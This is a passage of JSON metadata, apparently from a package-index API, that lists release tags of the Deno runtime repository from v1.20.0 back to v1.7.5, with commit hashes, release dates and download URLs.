tar.gz/v1.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0/manifests"},{"name":"v1.19.3","sha":"d6877e941cf270964015b86abae70b34febbef56","kind":"commit","published_at":"2022-03-10T11:22:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3/manifests"},{"name":"v1.19.2","sha":"84f9a2550369e3f5132ab2ab9f274f76f7db3a90","kind":"commit","published_at":"2022-03-03T16:53:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2/manifests"},{"name":"v1.19.1","sha":"8eb3f5f377fe278aec5039c259380f6ca8edadb8","kind":"commit","published_at":"2022-02-24T20:29:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1/manifests"},{"name":"v1.19.0","sha":"551ace40cc513403a6a0cfd21304a2f9a1db7ece","kind":"commit","published_at":"2022-02-17T00:54:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0/manifests"},{"name":"v1.18.2","sha":"ac4311880fd59383e1408647581cf996fb53fec9","kind":"commit","published_at":"2022-02-04T00:07:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2/manifests"},{"name":"v1.18.1","sha":"0c931060784ee83082f7c221374aed451d4f1ad6","kind":"commit","published_at":"2022-01-27T16:33:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1/manifests"},{"name":"v1.18.0","sha":"2ea535c8c1817a20a3915e350242423ee71cfa73","kind":"commit","published_at":"2022-01-20T16:19:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0/manifests"},{"name":"v1.17.3","sha":"df5fe5a35f8ace40275a822927f3385c828beba7","kind":"commit","published_at":"2022-01-12T16:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3/manifests"},{"name":"v1.17.2","sha":"ad4a07789441097ca477ebf796c31823b422db7a","kind":"commit","published_at":"2022-01-05T17:22:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2/manifests"},{"name":"v1.17.1","sha":"ded77918fbd324c6d4038127bfce60380d56397d","kind":"commit","published_at":"2021-12-22T17:48:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1/manifests"},{"name":"v1.17.0","sha":"5f11f87495effaf9b4ce6c8c615cdce3d50d91f8","kind":"commit","published_at":"2021-12-16T18:24:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0/manifests"},{"name":"v1.16.4","sha":"ab286750a8c87215a9651efb11fcc620f2914005","kind":"commit","published_at":"2021-12-03T18:43:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4/manifests"},{"name":"v1.16.3","sha":"bfa2f30529921155551e8b288bcda1e01c468b79","kind":"tag","published_at":"2021-11-24T23:06:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3/manifests"},{"name":"v1.16.2","sha":"4836ab769c00c83b7c5488c4d9c5f185be858e70","kind":"commit","published_at":"2021-11-17T16:00:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2/manifests"},{"name":"v1.16.1","sha":"fdf890a68d3d54d40c766fd78faeccb20bd2e2c6","kind":"commit","published_at":"2021-11-11T10:59:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1/manifests"},{"name":"v1.16.0","sha":"1eae6c139ee1dac28df57d67d993792b773fa1ff","kind":"commit","published_at":"2021-11-09T12:55:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0/manifests"},{"name":"v1.15.3","sha":"f32f458318819088d59f58b7a4c05f0d28e41dff","kind":"commit","published_at":"2021-10-25T11:11:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3/manifests"},{"name":"v1.15.2","sha":"71da8140737a0ee81dd324e1156fd920a790c1cb","kind":"commit","published_at":"2021-10-18T19:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2/manifests"},{"name":"v1.15.1","sha":"b1d63aefd9f150ed3acbc3d0a6c2f51dadad3d17","kind":"commit","published_at":"2021-10-13T07:48:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1/manifests"},{"name":"v1.15.0","sha":"de3fa08d6cfac7edffb2411bbb42bb49af70dc82","kind":"commit","published_at":"2021-10-12T17:57:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0/manifests"},{"name":"v1.14.3","sha":"1b7d6809f649318a0fb6f0e241c25885538bbe25","kind":"commit","published_at":"2021-10-04T22:03:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3/manifests"},{"name":"v1.14.2","sha":"3ab682918a7cb9e23f8451eedb88074766d27049","kind":"commit","published_at":"2021-09-28T12:00:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2/manifests"},{"name":"v1.14.1","sha":"f27902e749fb3a78ca35a0dc41c9fc53cd2806e1","kind":"commit","published_at":"2021-09-21T22:44:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1/manifests"},{"name":"v1.14.0","sha":"f92cc66f0dbf8e9753f2e98d4469190f3b561eb0","kind":"commit","published_at":"2021-09-14T20:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0/manifests"},{"name":"v1.13.2","sha":"7b882cc05f02e9b09e9ec2856e37730ae947f509","kind":"commit","published_at":"2021-08-23T20:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2/manifests"},{"name":"v1.13.1","sha":"c67f6c13cd1de22e32f81723bc9224b8e2103a7a","kind":"commit","published_at":"2021-08-16T21:42:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1/manifests"},{"name":"v1.13.0","sha":"d82351d67784a2bcb5431ebb233abc727f673152","kind":"commit","published_at":"2021-08-10T14:22:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0/manifests"},{"name":"v1.12.2","sha":"dfba7a2b0197b05b3cb61724096111cc618aa747","kind":"commit","published_at":"2021-07-26T14:38:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2/manifests"},{"name":"v1.12.1","sha":"7d69f06db88cf022f2c5c6e0b04493af7b50a98b","kind":"commit","published_at":"2021-07-19T19:09:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1/manifests"},{"name":"v1.12.0","sha":"1ad6575028bd5a13eb0633cc5e7649e18deec556","kind":"commit","published_at":"2021-07-13T08:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0/manifests"},{"name":"v1.11.5","sha":"1e57081906fd2c504c0e4895681bdc7386c1956f","kind":"commit","published_at":"2021-07-02T15:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5/manifests"},{"name":"v1.11.4","sha":"ed16f4332263e81bf00a39ebc2200291b1fcbb8e","kind":"commit","published_at":"2021-07-01T11:57:51.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4/manifests"},{"name":"v1.11.3","sha":"f4bed1081456089559c82441a13c4fb700840cac","kind":"commit","published_at":"2021-06-29T16:43:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3/manifests"},{"name":"v1.11.2","sha":"2c0e482221cd86fdbdc055c76f1c214200419946","kind":"commit","published_at":"2021-06-21T15:47:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2/manifests"},{"name":"v1.11.1","sha":"d7ce3adc8b97ebca61c1f527ea0f9b842d0a2dbe","kind":"commit","published_at":"2021-06-15T21:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1/manifests"},{"name":"v1.11.0","sha":"b98293e21cb7e55def8fea2ca015381150d4cebf","kind":"commit","published_at":"2021-06-08T19:38:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0/manifests"},{"name":"v1.10.3","sha":"1567c1013cc8ff12cf039137792da66a1d0015b5","kind":"tag","published_at":"2021-05-31T20:22:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3/manifests"},{"name":"v1.10.2","sha":"232ec7798c5ee38e645c2aea31aea3e9a81e17f3","kind":"commit","published_at":"2021-05-17T15:28:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2/manifests"},{"name":"v1.10.1","sha":"1cd1419e18386d512ab98849d132117182545b89","kind":"commit","published_at":"2021-05-12T03:11:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1/manifests"},{"name":"v1.10.0","sha":"57927781ed7eb8bb088d656768dc295716407c7a","kind":"commit","published_at":"2021-05-12T00:06:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0/manifests"},{"name":"v1.9.2","sha":"8074d8bcf3cdcc7e9a08df147e0082798a7c2760","kind":"commit","published_at":"2021-04-23T14:08:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2/manifests"},{"name":"v1.9.1","sha":"7760d9a669552e69211b101d4656662a3dddf8dd","kind":"commit","published_at":"2021-04-20T23:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1/manifests"},{"name":"v1.9.0","sha":"262ee78592209a1f8e449cfa1308dca9688a414e","kind":"commit","published_at":"2021-04-13T18:11:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0/manifests"},{"name":"v1.8.3","sha":"2e6b78be9095cc38c392e2477711ff6eec226704","kind":"commit","published_at":"2021-04-02T10:10:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3/manifests"},{"name":"v1.8.2","sha":"f50ed4e281e6c30120412271eb66a1fb67d1c63e","kind":"commit","published_at":"2021-03-21T20:12:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2/manifests"},{"name":"v1.8.1","sha":"8d3baa7777b6bd2a2631e1b87a4676b520f2b447","kind":"commit","published_at":"2021-03-09T20:55:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1/manifests"},{"name":"v1.8.0","sha":"18b894072d3eb6b04016e77ece0d78512f7ffca1","kind":"commit","published_at":"2021-03-02T23:23:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0/manifests"},{"name":"v1.7.5","sha":"e9669bf0656c2478416f6705ff218539dc42c126","kind":"commit","published_at":"2021-02-19T14:58:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1